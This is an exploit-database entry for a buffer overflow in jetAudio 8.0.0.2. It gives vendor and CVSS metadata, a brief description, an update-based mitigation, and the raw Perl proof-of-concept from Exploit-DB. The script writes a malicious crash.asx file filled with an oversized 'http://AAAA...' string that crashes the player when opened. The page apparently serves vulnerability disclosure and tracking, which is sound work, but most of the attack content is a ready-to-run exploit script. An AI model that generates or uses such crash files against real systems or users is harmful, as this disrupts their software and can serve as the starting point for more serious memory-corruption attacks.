header-logo
Suggest Exploit
vendor:
jetaudio
by:
cr4wl3r
7,8
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: jetaudio
Affected Version From: 8.0.0.2
Affected Version To: 8.0.0.2
Patch Exists: YES
Related CWE: N/A
CPE: 2.3:a:jetaudio:jetaudio:8.0.0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2020

jetAudio 8.0.0.2 Basic Local Crash Exploit

This exploit is a basic local crash exploit for jetAudio 8.0.0.2. It creates a malicious .asx file containing a long string of A's, which when opened in jetAudio causes a buffer overflow and a crash.

Mitigation:

Update to the latest version of jetAudio, or use an alternative media player.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Title: jetAudio 8.0.0.2 Basic Local Crash Exploit
# Author: cr4wl3r
# Platform: Windows
#########################################

my $file= "crash.asx";

my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "Done..!~#\n";